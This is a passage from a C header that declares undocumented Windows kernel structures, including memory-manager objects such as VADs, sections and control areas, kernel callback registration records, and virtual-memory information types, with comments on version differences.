Address; ULONG_PTR CreatorBackTraceIndex; }; KSPIN_LOCK SpinLock; } ERESOURCE, *PERESOURCE; /* * WDM END */ /* * MM START */ typedef ULONG MMSECTION_FLAGS2; typedef struct _MMEXTEND_INFO { ULONG_PTR CommittedSize; ULONG ReferenceCount; } MMEXTEND_INFO, * PMMEXTEND_INFO; /* size: 0x0010 */ // // Flags definitions valid only for Windows 10. // typedef struct _MMSECTION_FLAGS { struct { UINT BeingDeleted : 1; /* bit position: 0 */ UINT BeingCreated : 1; /* bit position: 1 */ UINT BeingPurged : 1; /* bit position: 2 */ UINT NoModifiedWriting : 1; /* bit position: 3 */ UINT FailAllIo : 1; /* bit position: 4 */ UINT Image : 1; /* bit position: 5 */ UINT Based : 1; /* bit position: 6 */ UINT File : 1; /* bit position: 7 */ UINT AttemptingDelete : 1; /* bit position: 8 */ UINT PrefetchCreated : 1; /* bit position: 9 */ UINT PhysicalMemory : 1; /* bit position: 10 */ UINT ImageControlAreaOnRemovableMedia : 1; /* bit position: 11 */ //CopyOnWrite UINT Reserve : 1; /* bit position: 12 */ UINT Commit : 1; /* bit position: 13 */ UINT NoChange : 1; /* bit position: 14 */ UINT WasPurged : 1; /* bit position: 15 */ UINT UserReference : 1; /* bit position: 16 */ UINT GlobalMemory : 1; /* bit position: 17 */ UINT DeleteOnClose : 1; /* bit position: 18 */ UINT FilePointerNull : 1; /* bit position: 19 */ UINT PreferredNode : 6; /* bit position: 20 */ UINT GlobalOnlyPerSession : 1; /* bit position: 26 */ UINT UserWritable : 1; /* bit position: 27 */ UINT SystemVaAllocated : 1; /* bit position: 28 */ UINT PreferredFsCompressionBoundary : 1; /* bit position: 29 */ UINT UsingFileExtents : 1; /* bit position: 30 */ UINT PageSize64K : 1; /* bit position: 31 */ }; } MMSECTION_FLAGS, * PMMSECTION_FLAGS; /* size: 0x0004 */ // // Flags definitions valid only for Windows 10. 
// typedef struct _SEGMENT_FLAGS { union { struct { USHORT TotalNumberOfPtes4132 : 10; /* bit position: 0 */ USHORT Spare0 : 2; /* bit position: 10 */ USHORT LargePages : 1; /* bit position: 12 */ USHORT DebugSymbolsLoaded : 1; /* bit position: 13 */ USHORT WriteCombined : 1; /* bit position: 14 */ USHORT NoCache : 1; /* bit position: 15 */ }; USHORT Short0; }; /* size: 0x0002 */ union { struct { UCHAR FloppyMedia : 1; /* bit position: 0 */ UCHAR DefaultProtectionMask : 5; /* bit position: 1 */ UCHAR Binary32 : 1; /* bit position: 6 */ UCHAR ContainsDebug : 1; /* bit position: 7 */ }; UCHAR UChar1; }; /* size: 0x0001 */ union { struct { UCHAR ForceCollision : 1; /* bit position: 0 */ UCHAR ImageSigningType : 3; /* bit position: 1 */ UCHAR ImageSigningLevel : 4; /* bit position: 4 */ }; UCHAR UChar2; }; } SEGMENT_FLAGS, * PSEGMENT_FLAGS; /* size: 0x0004 */ typedef struct _MI_SYSTEM_CACHE_VIEW_ATTRIBUTES { union { ULONGLONG NumberOfPtes : 6; ULONGLONG PartitionId : 10; ULONGLONG Spare : 2; ULONGLONG SectionOffset : 48; } u1; } MI_SYSTEM_CACHE_VIEW_ATTRIBUTES, * PMI_SYSTEM_CACHE_VIEW_ATTRIBUTES; #define VIEW_MAP_TYPE_PROCESS 1 #define VIEW_MAP_TYPE_SESSION 2 #define VIEW_MAP_TYPE_SYSTEM_CACHE 3 typedef struct _MI_REVERSE_VIEW_MAP { struct _LIST_ENTRY ViewLinks; union { VOID* SystemCacheVa; VOID* SessionViewVa; struct _EPROCESS* VadsProcess; ULONG Type : 2; } u1; union { struct _SUBSECTION* Subsection; ULONG SubsectionType : 1; } u2; union { struct _MI_SYSTEM_CACHE_VIEW_ATTRIBUTES SystemCacheAttributes; ULONGLONG AllAttributes; //Since W11 ULONGLONG SectionOffset; } u3; } MI_REVERSE_VIEW_MAP, * PMI_REVERSE_VIEW_MAP; /* size: 0x0028 */ typedef struct _RTL_BALANCED_NODE { union { struct _RTL_BALANCED_NODE* Children[2]; struct { struct _RTL_BALANCED_NODE* Left; struct _RTL_BALANCED_NODE* Right; }; }; union { UCHAR Red : 1; UCHAR Balance : 2; ULONG_PTR ParentValue; }; } RTL_BALANCED_NODE, * PRTL_BALANCED_NODE; typedef struct _SEGMENT { struct _CONTROL_AREA* ControlArea; 
unsigned long TotalNumberOfPtes; SEGMENT_FLAGS SegmentFlags; ULONG_PTR NumberOfCommittedPages; ULONG_PTR SizeOfSegment; union { struct _MMEXTEND_INFO* ExtendInfo; void* BasedAddress; } u1; EX_PUSH_LOCK SegmentLock; union { union { ULONG_PTR ImageCommitment; ULONG CreatingProcessId; }; } u2; union { union { struct _MI_SECTION_IMAGE_INFORMATION* ImageInformation; void* FirstMappedVa; }; } u3; struct _MMPTE* PrototypePte; } SEGMENT, * PSEGMENT; /* size: 0x0048 */ typedef struct _CONTROL_AREA_COMPAT { SEGMENT* Segment; LIST_ENTRY ListHead; ULONG_PTR NumberOfSectionReferences; ULONG_PTR NumberOfPfnReferences; ULONG_PTR NumberOfMappedViews; ULONG_PTR NumberOfUserReferences; union { union { ULONG LongFlags; MMSECTION_FLAGS Flags; }; } u; union { union { ULONG LongFlags; MMSECTION_FLAGS2 Flags; }; } u1; EX_FAST_REF FilePointer; volatile LONG ControlAreaLock; ULONG ModifiedWriteCount; struct _MI_CONTROL_AREA_WAIT_BLOCK* WaitList; union { struct { union { ULONG NumberOfSystemCacheViews; ULONG ImageRelocationStartBit; }; union { volatile LONG WritableUserReferences; struct // version dependent, this bitset is not valid for w11 { unsigned long ImageRelocationSizeIn64k : 16; /* bit position: 0 */ unsigned long LargePage : 1; /* bit position: 16 */ unsigned long SystemImage : 1; /* bit position: 17 */ unsigned long StrongCode : 2; /* bit position: 18 */ unsigned long CantMove : 1; /* bit position: 20 */ unsigned long BitMap : 2; /* bit position: 21 */ unsigned long ImageActive : 1; /* bit position: 23 */ }; }; union { ULONG FlushInProgressCount; ULONG NumberOfSubsections; struct _MI_IMAGE_SECURITY_REFERENCE* SeImageStub; }; } e2; } u2; // // Incomplete definition, tail is version dependent. // } CONTROL_AREA_COMPAT, * PCONTROL_AREA_COMPAT; // // N.B. // Only valid for Win10. // Change between Win10 versions. 
// typedef struct _MMVAD_SHORT { union { struct { struct _MMVAD_SHORT* NextVad; void* ExtraCreateInfo; }; struct _RTL_BALANCED_NODE VadNode; }; ULONG StartingVpn; ULONG EndingVpn; UCHAR StartingVpnHigh; UCHAR EndingVpnHigh; UCHAR CommitChargeHigh; UCHAR SpareNT64VadUChar; LONG ReferenceCount; EX_PUSH_LOCK PushLock; ULONG LongFlags; ULONG LongFlags1; struct _MI_VAD_EVENT_BLOCK* EventList; } MMVAD_SHORT, * PMMVAD_SHORT; /* size: 0x0040 */ typedef struct _MI_VAD_SEQUENTIAL_INFO { struct { #if defined(_AMD64_) ULONG_PTR Length : 12; /* bit position: 0 */ ULONG_PTR Vpn : 52; /* bit position: 12 */ #else ULONG Length : 11; /* bit position: 0 */ ULONG Vpn : 21; /* bit position: 11 */ #endif }; } MI_VAD_SEQUENTIAL_INFO, * PMI_VAD_SEQUENTIAL_INFO; // // N.B. // Only valid for Win10. // Flags meanings change between Win10 versions. // typedef struct _MMVAD_FLAGS { struct { ULONG VadType : 3; /* bit position: 0 */ ULONG Protection : 5; /* bit position: 3 */ ULONG PreferredNode : 6; /* bit position: 8 */ ULONG PrivateMemory : 1; /* bit position: 14 */ ULONG PrivateFixup : 1; /* bit position: 15 */ ULONG Enclave : 1; /* bit position: 16 */ ULONG PageSize64K : 1; /* bit position: 17 */ ULONG RfgControlStack : 1; /* bit position: 18 */ ULONG Spare : 8; /* bit position: 19 */ ULONG NoChange : 1; /* bit position: 27 */ ULONG ManySubsections : 1; /* bit position: 28 */ ULONG DeleteInProgress : 1; /* bit position: 29 */ ULONG LockContended : 1; /* bit position: 30 */ ULONG Lock : 1; /* bit position: 31 */ }; } MMVAD_FLAGS, * PMMVAD_FLAGS; /* size: 0x0004 */ // // N.B. // Only valid for Win10. // Flags meanings change between Win10 versions. // typedef struct _MMVAD_FLAGS1 { struct { ULONG CommitCharge : 31; /* bit position: 0 */ ULONG MemCommit : 1; /* bit position: 31 */ }; } MMVAD_FLAGS1, * PMMVAD_FLAGS1; /* size: 0x0004 */ // // N.B. // Only valid for Win10. // Flags meanings change between Win10 versions. 
// typedef struct _MMVAD_FLAGS2 { struct { ULONG FileOffset : 24; /* bit position: 0 */ ULONG Large : 1; /* bit position: 24 */ ULONG TrimBehind : 1; /* bit position: 25 */ ULONG Inherit : 1; /* bit position: 26 */ ULONG NoValidationNeeded : 1; /* bit position: 27 */ ULONG PrivateDemandZero : 1; /* bit position: 28 */ ULONG Spare : 3; /* bit position: 29 */ }; } MMVAD_FLAGS2, * PMMVAD_FLAGS2; /* size: 0x0004 */ typedef struct _MMVAD { struct _MMVAD_SHORT Core; union { union { ULONG LongFlags2; volatile struct _MMVAD_FLAGS2 VadFlags2; }; } u2; struct _SUBSECTION* Subsection; struct _MMPTE* FirstPrototypePte; struct _MMPTE* LastContiguousPte; LIST_ENTRY ViewLinks; struct _EPROCESS* VadsProcess; union { union { struct _MI_VAD_SEQUENTIAL_INFO SequentialVa; struct _MMEXTEND_INFO* ExtendedInfo; }; } u4; FILE_OBJECT* FileObject; } MMVAD, * PMMVAD; /* size: 0x0088 */ typedef struct _MMVIEW { ULONGLONG Entry; union { ULONGLONG Writable : 1; struct _CONTROL_AREA* ControlArea; }; LIST_ENTRY ViewLinks; PVOID SessionViewVa; ULONG SessionId; } MMVIEW, *PMMVIEW; typedef struct _MI_IMAGE_ENTRY_IN_SESSION { LIST_ENTRY Link; PVOID Address; // // Incomplete and incorrect. // } MI_IMAGE_ENTRY_IN_SESSION, * PMI_IMAGE_ENTRY_IN_SESSION; typedef struct _SUBSECTION_COMPAT { struct _CONTROL_AREA* ControlArea; struct _MMPTE* SubsectionBase; struct _SUBSECTION* NextSubsection; // // Incomplete definition. // } SUBSECTION_COMPAT, * PSUBSECTION_COMPAT; // // This is Windows 10 only Section Object definition. // // N.B. It completely differs from anything else. 
//
typedef struct _SECTION_COMPAT {
    RTL_BALANCED_NODE SectionNode;
    ULONG_PTR StartingVpn;
    ULONG_PTR EndingVpn;
    union {
        union {
            struct _CONTROL_AREA* ControlArea;
            struct _FILE_OBJECT* FileObject;
            struct {
                ULONG_PTR RemoteImageFileObject : 1; /* bit position: 0 */
                ULONG_PTR RemoteDataFileObject : 1; /* bit position: 1 */
            };
        };
    } u1;
    ULONG_PTR SizeOfSection;
    union {
        ULONG LongFlags;
        MMSECTION_FLAGS Flags;
    } u;
    struct {
        ULONG InitialPageProtection : 12; /* bit position: 0 */
        ULONG SessionId : 19; /* bit position: 12 */
        ULONG NoValidationNeeded : 1; /* bit position: 31 */
    };
} SECTION_COMPAT, * PSECTION_COMPAT; /* size: 0x0040 */

/*
* MM END
*/

/*
* Configuration Manager control vector
*/
typedef struct _CM_SYSTEM_CONTROL_VECTOR_V1 {
    PWSTR KeyPath;
    PWSTR ValueName;
    PVOID Buffer;
    PULONG BufferLength;
    PULONG Type;
} CM_SYSTEM_CONTROL_VECTOR_V1, * PCM_SYSTEM_CONTROL_VECTOR_V1;

//
// Since Windows 10 RS4
//
typedef struct _CM_SYSTEM_CONTROL_VECTOR_V2 {
    PWSTR KeyPath;
    PWSTR ValueName;
    PVOID Buffer;
    PULONG BufferLength;
    PULONG Type;
    ULONG Flags; //0 or 1 depends on flag from LOADER_PARAMETER_BLOCK attached hives
    ULONG Spare0;
} CM_SYSTEM_CONTROL_VECTOR_V2, * PCM_SYSTEM_CONTROL_VECTOR_V2;

/*
** Callbacks START
*/
typedef NTSTATUS(*PEX_CALLBACK_FUNCTION) (
    IN PVOID CallbackContext,
    IN PVOID Argument1,
    IN PVOID Argument2
    );

typedef VOID(NTAPI* PEX_HOST_NOTIFICATION) (
    _In_ ULONG NotificationType,
    _In_opt_ PVOID Context);

typedef struct _EX_EXTENSION_INFORMATION_V1 {
    USHORT Id;
    USHORT Version;
    USHORT FunctionCount;
} EX_EXTENSION_INFORMATION_V1, * PEX_EXTENSION_INFORMATION_V1;

typedef struct _EX_EXTENSION_VERSION {
    USHORT MajorVersion;
    USHORT MinorVersion;
} EX_EXTENSION_VERSION, * PEX_EXTENSION_VERSION;

typedef struct _EX_EXTENSION_INFORMATION_V2 {
    USHORT Id;
    EX_EXTENSION_VERSION Version;
    USHORT FunctionCount;
} EX_EXTENSION_INFORMATION_V2, * PEX_EXTENSION_INFORMATION_V2;

typedef struct _EX_HOST_TABLE {
    EX_EXTENSION_INFORMATION_V2 HostInformation;
    PVOID FunctionTable; //callbacks
} EX_HOST_TABLE, * PEX_HOST_TABLE;

typedef struct _EX_HOST_PARAMS {
    EX_EXTENSION_INFORMATION_V1 HostInformation;
    POOL_TYPE PoolType;
    PVOID HostTable;
    PVOID NotificationRoutine;
    PVOID NotificationContext;
} EX_HOST_PARAMS, * PEX_HOST_PARAMS;

typedef struct _EX_HOST_ENTRY_V1 {
    LIST_ENTRY ListEntry;
    LONG RefCounter;
    EX_HOST_PARAMS HostParameters;
    EX_RUNDOWN_REF RundownProtection;
    EX_PUSH_LOCK PushLock;
    PVOID FunctionTable; //callbacks
    ULONG Flags;
} EX_HOST_ENTRY_V1, * PEX_HOST_ENTRY_V1;

typedef struct _EX_HOST_ENTRY_V2 {
    LIST_ENTRY ListEntry;
    EX_EXTENSION_INFORMATION_V2 HostInformation;
    ULONG64 RefCounter;
    EX_PUSH_LOCK PushLock;
    PEX_HOST_TABLE HostTablesPtr;
    USHORT HostTablesCount;
    PEX_HOST_TABLE CurrentHostTableEntry; //only set when an extension registers
    PVOID NotificationRoutine;
    PVOID NotificationContext;
    EX_EXTENSION_VERSION ExtensionVersion;
    EX_RUNDOWN_REF RundownProtection;
    PVOID FunctionTable;
    USHORT ExtensionTableFunctionCount;
    ULONG Pad;
    ULONG Flags;
    EX_HOST_TABLE HostTables[1];
} EX_HOST_ENTRY_V2, * PEX_HOST_ENTRY_V2;

typedef struct _EX_EXTENSION_REGISTRATION {
    EX_EXTENSION_INFORMATION_V1 Information;
    PVOID FunctionTable;
    PVOID* HostTable;
    PDRIVER_OBJECT DriverObject;
} EX_EXTENSION_REGISTRATION, * PEX_EXTENSION_REGISTRATION;

typedef struct _EX_CALLBACK {
    EX_FAST_REF RoutineBlock;
} EX_CALLBACK, *PEX_CALLBACK;

typedef struct _EX_CALLBACK_ROUTINE_BLOCK {
    EX_RUNDOWN_REF RundownProtect;
    PVOID Function; //PEX_CALLBACK_FUNCTION
    PVOID Context;
} EX_CALLBACK_ROUTINE_BLOCK, *PEX_CALLBACK_ROUTINE_BLOCK;

typedef struct _KBUGCHECK_CALLBACK_RECORD {
    LIST_ENTRY Entry;
    PVOID CallbackRoutine;
    PVOID Buffer;
    ULONG Length;
    PUCHAR Component;
    ULONG_PTR Checksum;
    UCHAR State;
} KBUGCHECK_CALLBACK_RECORD, *PKBUGCHECK_CALLBACK_RECORD;

typedef enum _KBUGCHECK_CALLBACK_REASON {
    KbCallbackInvalid,
    KbCallbackReserved1,
    KbCallbackSecondaryDumpData,
    KbCallbackDumpIo,
    KbCallbackAddPages,
    KbCallbackSecondaryMultiPartDumpData,
    KbCallbackRemovePages,
    KbCallbackTriageDumpData
} KBUGCHECK_CALLBACK_REASON;

typedef struct _KBUGCHECK_REASON_CALLBACK_RECORD {
    LIST_ENTRY Entry;
    PVOID CallbackRoutine;
    PUCHAR Component;
    ULONG_PTR Checksum;
    KBUGCHECK_CALLBACK_REASON Reason;
    UCHAR State;
} KBUGCHECK_REASON_CALLBACK_RECORD, *PKBUGCHECK_REASON_CALLBACK_RECORD;

typedef struct _CM_CALLBACK_CONTEXT_BLOCK {
    LIST_ENTRY CallbackListEntry;
    LONG PreCallListHead;
    LARGE_INTEGER Cookie;
    PVOID CallerContext;
    PEX_CALLBACK_FUNCTION Function;
    UNICODE_STRING Altitude;
    LIST_ENTRY ObjectContextListHead;
} CM_CALLBACK_CONTEXT_BLOCK, *PCM_CALLBACK_CONTEXT_BLOCK;

typedef struct _SEP_LOGON_SESSION_TERMINATED_NOTIFICATION {
    struct _SEP_LOGON_SESSION_TERMINATED_NOTIFICATION *Next;
    PVOID CallbackRoutine; //PSE_LOGON_SESSION_TERMINATED_ROUTINE
} SEP_LOGON_SESSION_TERMINATED_NOTIFICATION, *PSEP_LOGON_SESSION_TERMINATED_NOTIFICATION;

typedef struct _NOTIFICATION_PACKET {
    LIST_ENTRY ListEntry;
    PVOID DriverObject; //PDRIVER_OBJECT
    PVOID NotificationRoutine; //PDRIVER_FS_NOTIFICATION
} NOTIFICATION_PACKET, *PNOTIFICATION_PACKET;

typedef struct _SHUTDOWN_PACKET {
    LIST_ENTRY ListEntry;
    PVOID DeviceObject; //PDEVICE_OBJECT
} SHUTDOWN_PACKET, *PSHUTDOWN_PACKET;

#define EX_CALLBACK_SIGNATURE 'llaC'

typedef struct _CALLBACK_OBJECT {
    ULONG Signature;
    KSPIN_LOCK Lock;
    LIST_ENTRY RegisteredCallbacks;
    BOOLEAN AllowMultipleCallbacks;
    UCHAR reserved[3];
} CALLBACK_OBJECT, *PCALLBACK_OBJECT;

// Since 8.1
typedef struct _CALLBACK_OBJECT_V2 {
    ULONG Signature;
    KSPIN_LOCK Lock;
    LIST_ENTRY RegisteredCallbacks;
    BOOLEAN AllowMultipleCallbacks;
    LIST_ENTRY ExpCallbackList;
} CALLBACK_OBJECT_V2, * PCALLBACK_OBJECT_V2;

typedef struct _CALLBACK_REGISTRATION {
    LIST_ENTRY Link;
    PCALLBACK_OBJECT CallbackObject;
    PVOID CallbackFunction; //PCALLBACK_FUNCTION
    PVOID CallbackContext;
    ULONG Busy;
    BOOLEAN UnregisterWaiting;
} CALLBACK_REGISTRATION, *PCALLBACK_REGISTRATION;

typedef ULONG OB_OPERATION;

#define OB_OPERATION_HANDLE_CREATE 0x00000001
#define OB_OPERATION_HANDLE_DUPLICATE 0x00000002

typedef struct _OB_CALLBACK_CONTEXT_BLOCK {
    LIST_ENTRY CallbackListEntry;
    OB_OPERATION Operations;
    ULONG Flags;
    struct _OB_REGISTRATION* Registration;
    POBJECT_TYPE ObjectType;
    PVOID PreCallback;
    PVOID PostCallback;
    EX_RUNDOWN_REF RundownReference;
} OB_CALLBACK_CONTEXT_BLOCK, *POB_CALLBACK_CONTEXT_BLOCK;

typedef struct _OB_REGISTRATION {
    USHORT Version;
    USHORT RegistrationCount;
    PVOID RegistrationContext;
    UNICODE_STRING Altitude;
    OB_CALLBACK_CONTEXT_BLOCK* CallbackContext;
} OB_REGISTRATION, * POB_REGISTRATION;

#define PO_POWER_SETTINGS_REGISTRATION_TAG 'teSP'

typedef struct _POP_POWER_SETTING_REGISTRATION_V1 {
    LIST_ENTRY Link;
    ULONG Tag;
    PVOID CallbackThread; //PKTHREAD
    UCHAR UnregisterOnReturn;
    UCHAR UnregisterPending;
    GUID Guid;
    PVOID LastValue; //PPOP_POWER_SETTING_VALUE
    PVOID Callback;
    PVOID Context;
    PDEVICE_OBJECT DeviceObject;
} POP_POWER_SETTING_REGISTRATION_V1, *PPOP_POWER_SETTING_REGISTRATION_V1;

//
// WARNING: this structure definition is incomplete.
// Tail is incorrect/incomplete for newest Win10 versions.
//
typedef struct _POP_POWER_SETTING_REGISTRATION_V2 {
    LIST_ENTRY Link;
    ULONG Tag;
    PVOID CallbackThread; //PKTHREAD
    UCHAR UnregisterOnReturn;
    UCHAR UnregisterPending;
    GUID Guid;
    GUID Guid2;
    PVOID LastValue; //PPOP_POWER_SETTING_VALUE
    PVOID Callback;
    PVOID Context;
    PDEVICE_OBJECT DeviceObject;
} POP_POWER_SETTING_REGISTRATION_V2, *PPOP_POWER_SETTING_REGISTRATION_V2;

typedef struct _RTL_CALLBACK_REGISTER {
    ULONG Flags;
    EX_RUNDOWN_REF RundownReference;
    PVOID DebugPrintCallback;
    LIST_ENTRY ListEntry;
} RTL_CALLBACK_REGISTER, *PRTL_CALLBACK_REGISTER;

typedef VOID (*PPO_COALESCING_CALLBACK) (
    _In_ ULONG Reason,
    _In_ PDEVICE_OBJECT DeviceObject,
    _In_ PVOID Context);

typedef struct _PO_COALESCING_CALLBACK_V1 {
    EX_PUSH_LOCK PushLock;
    PVOID CoalescingCallback;
    PVOID SelfPtr;
    PPO_COALESCING_CALLBACK Callback;
    BOOLEAN ClientOrServer;
    PVOID Context;
} PO_COALESCING_CALLBACK_V1, * PPO_COALESCING_CALLBACK_V1;

typedef struct _PO_COALESCING_CALLBACK_V2 {
    EX_PUSH_LOCK PushLock;
    PVOID CoalescingCallback;
    PVOID SelfPtr;
    PPO_COALESCING_CALLBACK Callback;
    BOOLEAN ClientOrServer;
    PVOID Context;
    LIST_ENTRY Link;
    EX_CALLBACK ExCallback;
} PO_COALESCING_CALLBACK_V2, * PPO_COALESCING_CALLBACK_V2;

typedef BOOLEAN (*PNMI_CALLBACK)(
    __in_opt PVOID Context,
    __in BOOLEAN Handled
    );

typedef struct _KNMI_HANDLER_CALLBACK {
    struct _KNMI_HANDLER_CALLBACK* Next;
    PNMI_CALLBACK Callback;
    PVOID Context;
    PVOID Handle;
} KNMI_HANDLER_CALLBACK, * PKNMI_HANDLER_CALLBACK;

typedef NTSTATUS (NTAPI* SILO_MONITOR_CREATE_CALLBACK)(
    _In_ PESILO Silo
    );

typedef VOID (NTAPI* SILO_MONITOR_TERMINATE_CALLBACK)(
    _In_ PESILO Silo
    );

#define SILO_MONITOR_REGISTRATION_VERSION (1)

typedef struct _SERVER_SILO_MONITOR {
    LIST_ENTRY ListEntry;
    UCHAR Version;
    BOOLEAN MonitorHost;
    BOOLEAN MonitorExistingSilos;
    UCHAR Reserved[5];
    SILO_MONITOR_CREATE_CALLBACK CreateCallback;
    SILO_MONITOR_TERMINATE_CALLBACK TerminateCallback;
    union {
        PUNICODE_STRING DriverObjectName;
        PUNICODE_STRING ComponentName;
    };
} SERVER_SILO_MONITOR, * PSERVER_SILO_MONITOR;

//
// Errata Manager
//
typedef struct _EMP_CALLBACK_DB_RECORD {
    GUID CallbackId;
    PVOID CallbackFunc;
    LONG_PTR CallbackFuncReference;
    PVOID Context;
    SINGLE_LIST_ENTRY List;
    SINGLE_LIST_ENTRY CallbackDependencyListHead;
    ULONG NumberOfStrings;
    ULONG NumberOfNumerics;
    ULONG NumberOfEntries;
    struct _EMP_ENTRY_DB_RECORD* EntryList[1];
} EMP_CALLBACK_DB_RECORD, * PEMP_CALLBACK_DB_RECORD;

typedef struct _EMP_CALLBACK_LIST_ENTRY {
    EMP_CALLBACK_DB_RECORD* CallbackRecord;
    SINGLE_LIST_ENTRY CallbackListEntry;
} EMP_CALLBACK_LIST_ENTRY, * PEMP_CALLBACK_LIST_ENTRY;

typedef enum _IO_NOTIFICATION_EVENT_CATEGORY {
    EventCategoryReserved,
    EventCategoryHardwareProfileChange,
    EventCategoryDeviceInterfaceChange,
    EventCategoryTargetDeviceChange
} IO_NOTIFICATION_EVENT_CATEGORY;

typedef NTSTATUS (*PDRIVER_NOTIFICATION_CALLBACK_ROUTINE) (
    IN PVOID NotificationStructure,
    IN PVOID Context
    );

typedef struct _KGUARDED_MUTEX {
    LONG Count;
    PKTHREAD Owner;
    ULONG Contention;
    KEVENT Event;
    union {
        struct {
            SHORT KernelApcDisable;
            SHORT SpecialApcDisable;
        };
        ULONG CombinedApcDisable;
    };
} KGUARDED_MUTEX, * PKGUARDED_MUTEX;

typedef struct _DEVICE_CLASS_NOTIFY_ENTRY {
    //
    // Header entries
    //
    LIST_ENTRY ListEntry;
    IO_NOTIFICATION_EVENT_CATEGORY EventCategory;
    ULONG SessionId;
    HANDLE SessionHandle;
    PDRIVER_NOTIFICATION_CALLBACK_ROUTINE CallbackRoutine;
    PVOID Context;
    PDRIVER_OBJECT DriverObject;
    USHORT RefCount;
    BOOLEAN Unregistered;
    PKGUARDED_MUTEX Lock;
    PERESOURCE EntryLock;
    //
    // ClassGuid - the guid of the device class we are interested in
    //
    GUID ClassGuid;
} DEVICE_CLASS_NOTIFY_ENTRY, * PDEVICE_CLASS_NOTIFY_ENTRY;

/*
** Callbacks END
*/

/*
* NTQSI Modules START
*/
typedef struct _RTL_PROCESS_MODULE_INFORMATION {
    HANDLE Section;
    PVOID MappedBase;
    PVOID ImageBase;
    ULONG ImageSize;
    ULONG Flags;
    USHORT LoadOrderIndex;
    USHORT InitOrderIndex;
    USHORT LoadCount;
    USHORT OffsetToFileName;
    UCHAR FullPathName[256];
} RTL_PROCESS_MODULE_INFORMATION, *PRTL_PROCESS_MODULE_INFORMATION;
typedef struct _RTL_PROCESS_MODULE_INFORMATION_EX {
    USHORT NextOffset;
    RTL_PROCESS_MODULE_INFORMATION BaseInfo;
    ULONG ImageChecksum;
    ULONG TimeDateStamp;
    PVOID DefaultBase;
} RTL_PROCESS_MODULE_INFORMATION_EX, *PRTL_PROCESS_MODULE_INFORMATION_EX;

typedef struct _RTL_PROCESS_MODULES {
    ULONG NumberOfModules;
    RTL_PROCESS_MODULE_INFORMATION Modules[1];
} RTL_PROCESS_MODULES, *PRTL_PROCESS_MODULES;

/*
* NTQSI Modules END
*/

/*
** Virtual Memory START
*/
typedef enum _MEMORY_INFORMATION_CLASS {
    MemoryBasicInformation = 0,
    MemoryWorkingSetInformation,
    MemoryMappedFilenameInformation,
    MemoryRegionInformation,
    MemoryWorkingSetExInformation,
    MemorySharedCommitInformation,
    MemoryImageInformation,
    MemoryRegionInformationEx,
    MemoryPrivilegedBasicInformation,
    MemoryEnclaveImageInformation,
    MemoryBasicInformationCapped,
    MemoryPhysicalContiguityInformation,
    MemoryBadInformation,
    MemoryBadInformationAllProcesses,
    MaxMemoryInfoClass
} MEMORY_INFORMATION_CLASS, *PMEMORY_INFORMATION_CLASS;

typedef enum _VIRTUAL_MEMORY_INFORMATION_CLASS {
    VmPrefetchInformation,
    VmPagePriorityInformation,
    VmCfgCallTargetInformation,
    VmPageDirtyStateInformation
} VIRTUAL_MEMORY_INFORMATION_CLASS;

typedef struct _MEMORY_REGION_INFORMATION {
    PVOID AllocationBase;
    ULONG AllocationProtect;
    union {
        ULONG RegionType;
        struct {
            ULONG Private : 1;
            ULONG MappedDataFile : 1;
            ULONG MappedImage : 1;
            ULONG MappedPageFile : 1;
            ULONG MappedPhysical : 1;
            ULONG DirectMapped : 1;
            ULONG SoftwareEnclave : 1;
            ULONG PageSize64K : 1;
            ULONG Reserved : 24;
        };
    };
    SIZE_T RegionSize;
    SIZE_T CommitSize;
} MEMORY_REGION_INFORMATION, *PMEMORY_REGION_INFORMATION;

typedef struct _MEMORY_REGION_INFORMATION_V2 {
    PVOID AllocationBase;
    ULONG AllocationProtect;
    union {
        ULONG RegionType;
        struct {
            ULONG Private : 1;
            ULONG MappedDataFile : 1;
            ULONG MappedImage : 1;
            ULONG MappedPageFile : 1;
            ULONG MappedPhysical : 1;
            ULONG DirectMapped : 1;
            ULONG SoftwareEnclave : 1; // RS3
            ULONG PageSize64K : 1;
            ULONG Reserved : 24;
        };
    };
    SIZE_T RegionSize;
    SIZE_T CommitSize;
    ULONG_PTR PartitionId; // 19H1
} MEMORY_REGION_INFORMATION_V2, * PMEMORY_REGION_INFORMATION_V2;

typedef struct _MEMORY_REGION_INFORMATION_V3 {
    PVOID AllocationBase;
    ULONG AllocationProtect;
    union {
        ULONG RegionType;
        struct {
            ULONG Private : 1;
            ULONG MappedDataFile : 1;
            ULONG MappedImage : 1;
            ULONG MappedPageFile : 1;
            ULONG MappedPhysical : 1;
            ULONG DirectMapped : 1;
            ULONG SoftwareEnclave : 1; // RS3
            ULONG PageSize64K : 1;
            ULONG PlaceholderReservation : 1; // RS4
            ULONG MappedAwe : 1; // 21H1
            ULONG MappedWriteWatch : 1;
            ULONG PageSizeLarge : 1;
            ULONG PageSizeHuge : 1;
            ULONG Reserved : 19;
        };
    };
    SIZE_T RegionSize;
    SIZE_T CommitSize;
    ULONG_PTR PartitionId; // 19H1
    ULONG_PTR NodePreference; // 20H1
} MEMORY_REGION_INFORMATION_V3, * PMEMORY_REGION_INFORMATION_V3;

typedef struct _MEMORY_RANGE_ENTRY {
    PVOID VirtualAddress;
    SIZE_T NumberOfBytes;
} MEMORY_RANGE_ENTRY, *PMEMORY_RANGE_ENTRY;

typedef struct _MEMORY_IMAGE_INFORMATION {
    PVOID ImageBase;
    SIZE_T SizeOfImage;
    union {
        ULONG ImageFlags;
        struct {
            ULONG ImagePartialMap : 1;
            ULONG ImageNotExecutable : 1;
            ULONG ImageSigningLevel : 4; // RS3
            ULONG ImageExtensionPresent : 1; // 24H2
            ULONG Reserved : 25;
        };
    };
} MEMORY_IMAGE_INFORMATION, * PMEMORY_IMAGE_INFORMATION;

typedef struct _MEMORY_ENCLAVE_IMAGE_INFORMATION {
    MEMORY_IMAGE_INFORMATION ImageInfo;
    UCHAR UniqueID[32];
    UCHAR AuthorID[32];
} MEMORY_ENCLAVE_IMAGE_INFORMATION, * PMEMORY_ENCLAVE_IMAGE_INFORMATION;

typedef struct _MEMORY_WORKING_SET_BLOCK {
    ULONG_PTR Protection : 5;
    ULONG_PTR ShareCount : 3;
    ULONG_PTR Shared : 1;
    ULONG_PTR Node : 3;
#ifdef _WIN64
    ULONG_PTR VirtualPage : 52;
#else
    ULONG VirtualPage : 20;
#endif
} MEMORY_WORKING_SET_BLOCK, * PMEMORY_WORKING_SET_BLOCK;

typedef struct _MEMORY_WORKING_SET_INFORMATION {
    ULONG_PTR NumberOfEntries;
    _Field_size_(NumberOfEntries) MEMORY_WORKING_SET_BLOCK WorkingSetInfo[1];
